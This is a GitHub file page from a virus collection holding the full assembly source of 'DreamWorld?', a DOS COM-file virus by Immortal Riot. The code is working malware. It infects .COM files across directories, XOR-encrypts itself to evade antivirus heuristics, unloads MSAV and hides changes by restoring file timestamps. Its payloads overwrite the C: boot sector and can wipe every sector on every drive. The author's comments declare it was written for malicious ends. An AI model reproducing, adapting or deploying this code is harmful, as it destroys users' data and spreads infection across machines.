forked from guitmz/virii
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathDREAMWRL.ASM
executable file
·260 lines (258 loc) · 10.4 KB
/
DREAMWRL.ASM
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
; -DreamWorld?-
; "Created by Immortal Riot's destructive development team"
; (c) 93/94 Immortal Riot - All rights reserved
;
; Dedication:
; "If Metal Militia was dead, this virus should be deadicated to him"
;
; Notes:
; This was 'written' in one day. It sucks, but not as good as my..
; ahh.. now I remember, I don't got a girl-friend, but my "girl-friend"
; think she got a boy-friend? Huh? She's nuts!
;
; Notes_II:
; F-Prot, Scan, TBAV, FindViru can't find shits of this code.
;
; Disclaimer:
; Well, I just gotta have one, you know. So, I hereby claim this:
; "I take no responsability for any damage, either direct or implied,
; caused by the usage of the virus source code or of the resulting code
; after assembly. No warrant is made about the product functionability
; or quality. The code was written in pure educational purposes ONLY."
;
; Truth:
; Well, this was written only for malicious intends. I havn't learned
; a shit by writing this shit. Now you know that.. Well, I just had
; some hours spare time, and a huge appetite for destruction. That's why
; this virus was created. No more, no less. Ciao! /The Unforgiven
.model tiny ;
.code ;
org 100h ;
;
Start: ;
db 0e9h ; Jump to start1 and mark this file
DW 0 ; as virus-infected!
;
Start1: ;
xchg ax,ax ; It's simply two NOPs
nop ;
;
mov ax,0fa01h ; Let's un-install MSAV junk program
mov dx,5945h ; from memory for a cost of 8 bytes :)
int 16h ;
;
call get_delta ; Get the delta offset
get_delta: ;
pop bp ;
sub bp, offset get_delta ;
;
Call_en_de_crypt: ; Well, just using alternitive code
mov ax,bp ; for a "call en_de_crypt", for satisfying
add ax,011dh ; my very sick brain..
push ax ;
jmp short en_de_crypt ;
jmp short real_code_start ; Sneee!
;
crypt_val dw 0 ; We get a random value for each encryption!
;
Write_virus: ;
call en_de_crypt ; Encrypt virus before we write!
mov ah,65d ; 65d - 1d = 40HEX!
sub ah,1d ; ^^^ How meaningless!
mov cx, end_of_virus - start1 ; CX = bytes to write
lea dx, [bp+start1] ; ; DX = Where to write from (100h)
int 21h ; ; Duh!
;
call en_de_crypt ; Decrypt virus again
ret ;
;
En_de_crypt: ; Heuristic, Heuristic, eat this!
;
mov ax,word ptr [bp+crypt_val]
lea si,[bp+encrypt_start] ;
mov cx,(end_of_virus-start1+1)/2
;
Xor_loop: ;
xor word ptr [si],ax ; Encrypting two bytes/loop, until
add si,2 ; all the code between encryption_start
loop xor_loop ; to end_of_virus is encrypted!
ret ;
;
Encrypt_start: ; All code here and below is encrypted,
Real_code_start: ; making it hard for heuristic scanners!
;
mov ah,2ah ; First, we check for what date it is
int 21h ;
cmp dl,31 ; Is it the 31st any month?
jne not_now ; Nop!
;
Cruel: ;
mov ah,09h ; It's the 31st any month!
lea dx,[bp+v_name] ; or the 1/100 of a second = 1
int 21h ; we'll print a message!
;
mov al,2h ; and after that, we'll brutally
mov cx,1 ; overwrite the first-sector on
lea bx,v_name ; drive C: with our virus name!
cwd ;
int 26h ;
;
Not_now: ; It wasn't the 31:st, so,
mov ah,2ch ; we'll take a random number
int 21h ; from a 1/100 of a second and if
cmp dl,1 ; the value is 1, we'll trash the
je cruel ; boot-sector on drive C: and if
cmp dl,98 ; the value is 99 we will brutally
jbe no_harm ; destroy all sectors on all drives.
;
Trash_sucker: ;
mov al,2h ; We'll start on drive C: (2h)
Drive: ; We'll overwrite one sector/run!
mov cx,1 ; with our virus name, and we'll
lea bx,v_name ; write from sector one, with the
xor dx,dx ; very nice interrupt 26h (sector write!)
Next_Sector: ; and after we've written one sector we'll
int 26h ; jump to the next sector and overwrite
inc dx ; that too, and loop until all sectors are
jnc next_sector ; being overwritten, then, we'll jump to
inc al ; the next drive, and overwrite all sectors
jmp short drive ; there as well. And the next drive, and
; the next.. :-).
No_Harm: ;
lea dx,[bp+offset dta] ; Set the DTA to variable called DTA
call set_dta ; (DTA=42 byte chunk of memory!)
;
Buf_Xfer: ; Restore the beginning..
lea si, [bp+offset org3] ;
mov di, 100h ; DI=100h
push di ; Store di with our new value.
movsw ; Move string by word (the first two bytes!)
movsb ; Move string by byte (the third byte in the
; buffer), b'cos our org3 buffer is 3 bytes!
;
Get_drive: ;
mov ah,19h ; We'll get the drive from were we're executed
int 21h ; from, and if an infected file is being run
cmp al,2 ; from A: or B: we'll not search for more files
jae Get_dir ; to infect b'cos we havn't got a int24 handler.
ret ; Let the infected files run normally!
;
Get_dir: ; Get directory from where we're being executed
mov ah,47h ; from. Must do that b'cos we're using the
sub dl,dl ; dot-dot method to travel around!
lea si,[bp+end_of_virus+2ch];
int 21h ;
;
Findfirst: ;
mov ah, 4eh ; FindFirst file
lea dx, [bp+masker] ; with the extension of 'COM'
_4fh: ; When called ah=4fh (findnextfile)
int 21h ;
jnc open_file ; We found a file!
; Then, open it!
Chdir: ;
mov ah,3bh ; We didn't find any files
lea dx,[bp+offset dot_dot] ; in the current dir, so we'll move
int 21h ; to the ".." location in the tree and
jc quit ; search for more files, if location doesn't
jmp short findfirst ; exist (ax=03h), we'll quit, otherwise, we'll
; search for the first file in the new dir.
Open_file: ;
mov ax, 3D02h ; Open the file in read/write mode
lea dx, [bp+offset dta+1eh] ; Filename is located in DTA at offset 1Eh
int 21h ;
xchg ax, bx ; Faster/bigger than mov BX,AX
;
mov ax,5700h ; Take the file's time/date
int 21h ; (ah=57h = get/set time/date)
; (al=01h = get time/date)
push cx ; Store time!
push dx ; Store date!
;
mov cx, 3 ; Read first three bytes of the file
lea dx, [bp+org3] ; to the buffer (org3)
mov ah, 3fh ;
int 21h ;
; Check if already infected
mov cx, word ptr [bp+ORG3+1];
mov ax, word ptr [bp+DTA+1ah]
add cx, end_of_virus - start1 + 3
cmp ax, cx ;
jz restore_time_date ; It's already infected!
; No, it's not infected!
sub ax, 3 ;
mov word ptr [bp+writebuffer], ax
;
xor al, al ; Then, we'll move the file-poiter to
call f_ptr ; the beginning of the file, and
mov cx, 3 ; Write three bytes (our own jmp)
lea dx, [bp+e9] ;
mov ah, 40h ;
int 21h ;
;
mov al, 2 ; Then, we'll move the file-pointer to
call f_ptr ; end_of_file.
;
Get_Random: ;
mov ah,2ch ; Darn, this little trick is really
int 21h ; cool, b'cos we'll not get the same
add dl, dh ; encryption-value on any infected file,
jz get_random ; resulting in no bytes except the one used
mov word ptr [bp+crypt_val],dx; for the decrypt routine remains constant!
;
call write_virus ; Now, write the virus!
;
Restore_time_date: ; Cover our tracks..
pop dx ; Restore file date!
pop cx ; Restore file time!
; Notice the order "push cx/dx pop dx/cx!"
mov ax,5701h ; ah=57h (get/set attribs),
int 21h ; al=01h (set attribs)
;
Close_file: ;
mov ah, 3eh ; Close the file,
int 21h ; which now is infected!
;
mov ah, 4fh ; This little trick, is really
jmp short _4fh ; really neat, I think..
;
Quit: ;
lea dx,[bp+end_of_virus+2ch]; First, we'll change back to the
mov ah,3bh ; directory from where we were executed
int 21h ;
;
Fix_it: ;
mov dx, 80h ; Then, we'll set back the DTA to its
; default value (note- this is NOT used
; when the virus is running!)
Set_dta: ;
mov ah, 1ah ; Set the dta, used twice in this virus,
int 21h ; one when we started, and now, when we're
; ready!
Exit: ; Then, we'll return and execute
retn ; the "real" program!
;
F_ptr: ; Since we moved the file-pointer to
mov ah, 42h ; end of file twice, this saves some
xor cx, cx ; bytes!
cwd ; Clear dx (smallest variant!)
int 21h ;
retn ; Return to caller!
;
V_name db '[DreamWorld?]','$' ; It's the name for the virus
dream db '"I have a dream..."'; Me and Martin Luther King!
msg db 'Copy me, so I can travel around the globe!'
db 'Spreading my message, manipulating your'
db 'thoughts, your mind, and your actions'
db '"Love, Peace, Empathy!"'
copyr db "(c) 93/94 Immortal Riot - All rights reserved!"
Dot_dot db '..',0
Masker db '*.com',0
Org3 db 0cdh, 20h, 0 ; original three bytes saved here
E9 db 0e9h ; the jmp
End_of_virus equ $
Writebuffer dw ? ; Scratch area for the JMP
Dta db 42 dup (?) ; 42 bytes of chunk in memory, but
; not in the files!
Virus_end:
end start